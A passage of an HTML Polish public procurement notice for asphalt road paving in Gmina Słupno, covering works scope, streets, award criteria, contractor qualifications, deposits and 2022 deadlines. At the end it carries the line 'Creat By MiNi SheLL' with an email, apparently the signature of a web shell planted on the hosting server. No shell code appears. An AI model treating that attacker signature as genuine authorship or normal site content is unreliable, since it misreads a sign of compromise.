class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> – CZĘŚĆ 4 – Utwardzenie mieszanką asfaltową dróg na terenie Gminy Słupno.<br/>	Zakres prac obejmuje<br/>- Tyczenie geodezyjne osi drogi,<br/>- Mechaniczne lub ręczne profilowanie (korytowanie) istniejącej korony drogi lub ścieżki,<br/>- Frezowanie nawierzchni asfaltowej – średnia głębokość frezowania 3cm<br/>- Zagęszczenie istniejącej korony drogi lub ścieżki,<br/>- Regulacja wysokościowa studni i zasuw,<br/>- Ułożenie warstwy asfaltowej – grubości (zgodnie z opisem) po zagęszczeniu,<br/>- Mechaniczne zagęszczenie ułożonej warstwy asfaltowej (walec, zagęszczarka).<br/>Wymagania sprzętowe<br/>- Rozkładarka mas asfaltowych, <br/>- Koparka/koparko ładowarka z łyżką umożliwiającą wykonanie koryta,<br/>- Samochód lub samochody samowyładowcze,<br/>- Walec umożliwiający prawidłowe zagęszczenie mieszanki asfaltowej,<br/>- Zagęszczarka. <br/> Wymagania materiałowe<br/>Mieszanka którą należy użyć do wykonania prac to beton asfaltowy AC11. Wykonawca na żądanie Zamawiającego przedłoży dla danej partii potwierdzone za zgodność z oryginałem recepty, atesty na materiały oraz wyniki badań mieszanki mineralno-asfaltowej produkowanej w otaczarce.<br/>Wykonawca powinien dysponować sprzętem umożliwiającym prawidłowe wbudowanie oraz zagęszczenie masy asfaltowej.<br/>Czas na realizację <br/>- do 4 miesięcy od daty zawarcia umowy.<br/>Opis robót<br/>Zakres robót obejmuje tyczenie osi drogi przez uprawnionego geodetę. Nie wymagana jest inwentaryzacja geodezyjna oraz wykonanie map inwentaryzacyjnych poza inwentaryzacją geodezyjną na ulicy Północnej.<br/>Mechaniczne profilowanie (korytowania) istniejącej korony drogi przy pomocy równiarki, koparko-ładowarki, koparki lub ręcznie oraz zagęszczenie przy pomocy walca lub zagęszczarki. Wykonanie niezbędnych robót przygotowawczych – regulacja wysokościowa studni i zasuw. Frezowania nawierzchni asfaltowej na zimno przy użyciu frezarki i odwiezienie ścinki na plac zamawiającego na odległości 5 km. Ułożenie warstwy asfaltowej – grubości, zagęszczenie i szerokości – zgodnie z opisem. Dodatkowo należy wykonać zjazdy do każdej posesji i każdej krzyżującej się drogi. Każda partia materiału musi być dopuszczona do wbudowania przez inspektora nadzoru lub upoważnionego pracownika Urzędu Gminy. Ułożona warstwa powinna być odpowiednio wyprofilowana. <br/>Za prawidłowość wykonanych prac odpowiada wykonawca.<br/>Zakres robót<br/>Zamawiający przewiduje następujące ulice na terenie gminy do utwardzenia mieszanko asfaltowo-mineralną:<br/>Cekanowo ul. Ceglana – 330m długości, 4m szerokości i 5cm grubości (regulacja 3 studni kanalizacyjnych), powierzchnia 1320m2<br/>Słupno ulica Dębowa – 1310m2 i 4 cm grubości, (frezowania na średnio głębokości 3cm, regulacja 11 studni kanalizacyjnych, 2 kratek deszczowych i 2 zasuw do wody)<br/>Słupno ulica Akacjowa – 760m2 i 4 cm grubości, (frezowania na średnio głębokości 3cm, regulacja 11 studni kanalizacyjnych i dwóch zasuw do wody)<br/>Co stanowi 3390m2, do tego doliczane jest 5% na wykonanie skrzyżowań i dojazdów z remontowanej ulic do posesjami znajdujących się przy niej.<br/>W sumie jest do wykonania 3560m2 nawierzchni drogi z asfaltu.<br/>Rozliczenie robót<br/>Rozliczenie nastąpi po wykonaniu robót i odbiorze potwierdzonym przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga:<br/>a) dla części 1 - aby wykonawca wykonał w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie – co najmniej 1 zamówienie polegające na budowie lub przebudowie lub rozbudowie lub remoncie drogi o powierzchni minimum 3.000,00m2,<br/>b) dla części 2 - aby wykonawca wykonał w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie – co najmniej 1 zamówienie polegające na budowie lub przebudowie lub rozbudowie lub remoncie drogi o powierzchni minimum 3.000,00m2,<br/>c) dla części 3 - aby wykonawca wykonał w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie – co najmniej 1 zamówienie polegające na budowie lub przebudowie lub rozbudowie lub remoncie drogi o powierzchni minimum 10.000,00m2,<br/>d) dla części 4 - aby wykonawca wykonał w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie – co najmniej 1 zamówienie polegające na budowie lub przebudowie lub rozbudowie lub remoncie drogi o powierzchni minimum 2.500,00m2. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nne dokumenty dołączane do oferty:<br/>1) Pełnomocnictwo osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z<br/>załączonych dokumentów.<br/>2) W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi.<br/>3) Zobowiązanie podmiotu udostępniającego zasoby – Załącznik Nr 3 lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. /jeżeli<br/>dotyczy/<br/>4) Oświadczenie z art. 117 ust. 4 Pzp - Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia – Załącznik Nr<br/>4./jeżeli dotyczy/<br/>5) Dowód wniesienia wadium, jeżeli zostało wniesione w innej formie niż pieniądz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępując do postępowania jest zobowiązany wnieść wadium w wysokości: <br/>- dla części 1 : 1.000,00 zł (słownie: jeden tysiąc złotych),<br/>- dla części 2: 1.200,00 zł (słownie: jeden tysiąc dwieście złotych),<br/>- dla części 3: 700,00zł (słownie: siedemset złotych),<br/>- dla części 4 : 2.000,00zł (słownie: dwa tysiące złotych),<br/>do upływu terminu składania ofert.<br/>Wykonawca składając ofertę na więcej niż jedną część, wnosi wadium odpowiednio dla każdej z nich. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały przewidziane w SWZ - projektowanych postanowieniach umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-04 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-02</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com